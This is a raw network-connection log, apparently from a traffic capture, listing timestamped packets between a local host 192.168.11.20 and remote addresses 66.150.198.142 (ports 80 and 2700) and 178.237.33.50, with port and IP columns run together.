                                                          Sep 27, 2024 12:58:44.535371065 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535381079 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535381079 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535381079 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535465956 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535521984 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535537958 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535600901 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535655975 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535713911 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535826921 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535878897 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535880089 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535880089 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535922050 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535979986 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536035061 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536046982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536112070 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536168098 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536223888 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536225080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536225080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536319971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536377907 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536386967 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536454916 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536510944 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536609888 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536668062 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536726952 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536734104 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536802053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536856890 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536956072 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537013054 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537075043 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537081957 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537148952 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537204981 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537313938 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537369967 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537467957 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537524939 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537583113 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537590027 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537657976 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537713051 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537822008 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537879944 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537925005 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537925005 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.538089037 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.538089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.654299021 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.654661894 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.044846058 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.160448074 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.160684109 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.166186094 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.290008068 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.334038973 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.448945045 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.454472065 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.616558075 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.616980076 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.740111113 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.743278027 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.888233900 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.942969084 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.009711981 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.057607889 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.061098099 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.099132061 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.176002979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.176501036 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.185503006 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.199717999 CEST8049785178.237.33.50192.168.11.20
                                                          Sep 27, 2024 12:58:46.199935913 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.200033903 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.306593895 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.349101067 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.394920111 CEST8049785178.237.33.50192.168.11.20
                                                          Sep 27, 2024 12:58:46.395550966 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.438052893 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.464391947 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.473875999 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.603197098 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.634720087 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.635382891 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.757359982 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757438898 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757503986 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757654905 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.757893085 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757961035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758021116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758081913 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758141994 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758200884 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758251905 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.758261919 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758394957 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.758584023 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.873647928 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873725891 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873783112 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873837948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873895884 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873951912 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874010086 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874067068 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874121904 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874176979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874250889 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874320984 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874377966 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874434948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874490023 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874558926 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874622107 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874737024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874742985 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874950886 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.875190020 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990118027 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990148067 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990159035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990170956 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990181923 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990223885 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990283012 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990295887 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990307093 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990318060 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990366936 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990406990 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990422964 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990433931 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990446091 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990488052 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990499020 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990565062 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990586996 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990588903 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990715027 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990818024 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991269112 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991322994 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991334915 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991345882 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991369963 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991380930 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991391897 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991414070 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991425991 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991436958 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991447926 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991472006 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991483927 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991507053 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991534948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991563082 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991575956 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991588116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991599083 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991612911 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991626024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991637945 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991650105 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991733074 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991831064 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.105886936 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105901957 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105925083 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105936050 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105947018 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105964899 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105977058 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105988979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106031895 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106085062 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106096029 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106106997 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106125116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106136084 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106278896 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106334925 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106347084 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106358051 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106384993 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106396914 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106408119 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106429100 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106440067 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106451035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106462955 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106527090 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106528997 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106585026 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106595993 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106607914 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106699944 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106756926 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106769085 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106780052 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106796980 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106825113 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.106825113 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.106827021 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106957912 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106992960 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.106992960 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.107049942 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107094049 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107120037 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107144117 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107156038 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107167006 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107189894 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107203007 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107233047 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107234955 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.107253075 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107278109 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107297897 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107310057 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107321024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107362032 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107372999 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107383966 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107460022 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107518911 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107531071 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107542038 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107563972 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107575893 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107587099 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107599020 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107615948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107628107 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107639074 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107650042 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.107659101 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107671022 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107681990 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107691050 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.107727051 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.107842922 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.107842922 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.108340025 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108392000 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108447075 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108458996 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108540058 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108592987 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.108644009 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.108726025 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.108798981 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.222187042 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.222413063 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.222480059 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.222556114 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.222584963 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.222697973 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.222798109 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.222840071 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.222852945 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.222978115 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223120928 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223145008 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223174095 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223366976 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223445892 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223480940 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223516941 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223540068 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223598957 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223654985 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223711014 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223752975 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223767042 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223803997 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223824024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223881006 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223917961 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.223937035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.223994017 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224050045 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224083900 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224083900 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224106073 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224163055 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224204063 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224272966 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224307060 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224333048 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224360943 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224390030 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224447966 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224486113 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224504948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224536896 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.224560976 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224617004 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.224672079 CEST27004978666.150.198.142192.168.11.20
